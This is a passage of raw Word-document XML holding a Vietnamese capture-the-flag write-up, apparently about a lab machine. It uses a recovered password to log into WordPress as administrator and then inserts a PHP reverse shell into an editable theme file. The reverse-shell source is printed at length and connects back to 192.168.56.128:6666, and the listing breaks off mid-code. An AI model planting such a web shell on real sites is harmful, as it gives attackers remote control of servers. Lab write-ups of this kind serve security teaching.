          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35F0620B" wp14:editId="2E061EF5">
            <wp:extent cx="5731510" cy="22415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24155"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEFF744" w14:textId="74770072" w:rsidR="00D215F8" w:rsidRDefault="00D215F8" w:rsidP="00EB561B">
      <w:r>
        <w:t>Và đây có thể là password của user victor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145910D3" w14:textId="1B854072" w:rsidR="00D215F8" w:rsidRDefault="00D215F8" w:rsidP="00EB561B">
      <w:r w:rsidRPr="00D215F8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6387AEB9" wp14:editId="784A212A">
            <wp:extent cx="5731510" cy="29692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969260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6206128E" w14:textId="0C7D337D" w:rsidR="00383024" w:rsidRDefault="00383024" w:rsidP="00EB561B">
      <w:r>
        <w:t>Thử thêm với user saket, nhưng kết quả đều sai.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2CFAAF" w14:textId="775AE73D" w:rsidR="00E63F8F" w:rsidRDefault="00E63F8F" w:rsidP="00EB561B">
      <w:r>
        <w:t>Có thể mật khẩu này của wordpress.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75661833" w14:textId="31401402" w:rsidR="00E63F8F" w:rsidRDefault="00D44F7C" w:rsidP="00EB561B">
      <w:r>
        <w:t>Thử đăng nhập wordpress với thông tin đăng nhập là {</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44F7C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>victor:follow_the_ippsec</w:t>
      </w:r>
      <w:r>
        <w:t>} thì thành công đăng nhập</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024C65B3" w14:textId="29C84971" w:rsidR="00D44F7C" w:rsidRDefault="008E6A2C" w:rsidP="00EB561B">
      <w:r>
        <w:t>Nhìn sơ qua thì đây là bản Wordpress 6.1.1 với 2 plugin được cài:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B64367" w14:textId="36C47189" w:rsidR="008E6A2C" w:rsidRDefault="008E6A2C" w:rsidP="00EB561B">
      <w:r w:rsidRPr="008E6A2C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E40194B" wp14:editId="0419EF91">
            <wp:extent cx="5731510" cy="229679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296795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2944689E" w14:textId="12B914D2" w:rsidR="00853582" w:rsidRDefault="00853582" w:rsidP="00EB561B">
      <w:r>
        <w:t>Tại tab Users, ta thấy Victor chính là quản trị viên trang wordpress này:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05930C74" w14:textId="0BB84360" w:rsidR="00DA7DE8" w:rsidRDefault="00853582" w:rsidP="00EB561B">
      <w:r w:rsidRPr="00853582">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F359E8A" wp14:editId="53840B74">
            <wp:extent cx="5731510" cy="171640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716405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FD725F" w14:textId="06B3E4BC" w:rsidR="00853582" w:rsidRDefault="00853582" w:rsidP="00EB561B">
      <w:r>
        <w:t>Từ đó, ta có thể tuỳ chỉnh plugin</w:t>
      </w:r>
      <w:r w:rsidR="003931C3">
        <w:t xml:space="preserve"> để tạo một reverseshell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37482F55" w14:textId="01BF4078" w:rsidR="00156625" w:rsidRDefault="00761000" w:rsidP="00EB561B">
      <w:r>
        <w:t>Tại Plugin Editor trong tab Plugins, ta sẽ tuỳ chỉnh mã nguồn của plugin Hello Dolly để tạo 1 reverseshell</w:t>
      </w:r>
      <w:r w:rsidR="00156625">
        <w:t xml:space="preserve">, nhưng </w:t>
      </w:r>
      <w:r w:rsidR="004828C0">
        <w:t>đáng tiếc chúng ta không có quyền chỉnh sửa mã nguồn các plgin này</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B380D98" w14:textId="6AC90B89" w:rsidR="00E9453B" w:rsidRDefault="000036F4" w:rsidP="00EB561B">
      <w:r>
        <w:t>Còn các theme thì sao, có 3 theme hiện có trong ứng dụng</w:t>
      </w:r>
      <w:r w:rsidR="00E9453B">
        <w:t>, hãy kiểm tra các file có thể chỉnh sửa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCC6DA6" w14:textId="41769863" w:rsidR="00E9453B" w:rsidRDefault="00BB5E8C" w:rsidP="00EB561B">
      <w:r>
        <w:t>Thực sự tồn tại 1 file php như vậy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC0D61E" w14:textId="5268B33B" w:rsidR="00BB5E8C" w:rsidRDefault="00BB5E8C" w:rsidP="00EB561B">
      <w:r w:rsidRPr="00BB5E8C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E818658" wp14:editId="36A16602">
            <wp:extent cx="5731510" cy="26898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689860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B0C0E4" w14:textId="3D41DEDB" w:rsidR="009E0729" w:rsidRDefault="009E0729" w:rsidP="00EB561B">
      <w:r>
        <w:t>Thêm vào file đoạn mã reverseshell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230F5871" w14:textId="77777777" w:rsidR="009E0729" w:rsidRDefault="009E0729" w:rsidP="00EB561B"/>
    <w:p w14:paraId="79A07586" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC98566" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>set_time_limit (0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0F6D4D" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>$VERSION = "1.0";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E0F53E" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>$ip = '192.168.56.128';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182D364D" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>$port = 6666;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1988D54F" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>$chunk_size = 1400;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316BE70E" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>$write_a = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138BD623" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>$error_a = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A2AC37" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>$shell = 'uname -a; w; id; sh -i';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B5C053" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>$daemon = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA02438" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>$debug = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169A39AF" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35A3B109" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>if (function_exists('pcntl_fork')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CB8487" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>$pid = pcntl_fork();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A81C37" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="794F3667" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if ($pid == -1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE7181C" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>printit("ERROR: Can't fork");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3294CC67" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>exit(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11726A5B" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D66DDDA" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E59E843" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if ($pid) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3013C0" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>exit(0);  // Parent exits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21729C8C" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EC5AA3" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if (posix_setsid() == -1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5DE666" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>printit("Error: Can't setsid()");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5C9FF6" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>exit(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F717017" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE60663" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C8FCA40" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>$daemon = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534EBB43" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E72D428" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6641BBB3" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CAB293" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35315E23" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>chdir("/");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F5290D" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7534BB60" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>umask(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0305420C" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BC376AF" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>// Open reverse connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AD1DDA" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>$sock = fsockopen($ip, $port, $errno, $errstr, 30);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505EEB91" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>if (!$sock) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647FFC6E" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>printit("$errstr ($errno)");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D03F13D" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>exit(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4A6C81" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3131654F" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F085660" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>$descriptorspec = array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE67014" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   0 =&gt; array("pipe", "r"),  // stdin is a pipe that the child will read from</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C666284" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   1 =&gt; array("pipe", "w"),  // stdout is a pipe that the child will write to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDE4515" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   2 =&gt; array("pipe", "w")   // stderr is a pipe that the child will write to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100D1C63" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6206A8B3" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3482D7B6" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>$process = proc_open($shell, $descriptorspec, $pipes);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9A1E30" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2584CC57" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>if (!is_resource($process)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729FE238" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>printit("ERROR: Can't spawn shell");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB67C85" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>exit(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D3F606" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9219D2" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52F57EBB" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>stream_set_blocking($pipes[0], 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0BA613" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>stream_set_blocking($pipes[1], 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEEEE15" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>stream_set_blocking($pipes[2], 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25308AE6" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>stream_set_blocking($sock, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524D695A" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ECF8CB0" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>printit("Successfully opened reverse shell to $ip:$port");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B554AD3" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1224697B" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>while (1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EF4BA8" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if (feof($sock)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3639CF" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>printit("ERROR: Shell connection terminated");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17548282" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201F7392" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A1604F" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56F8A059" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
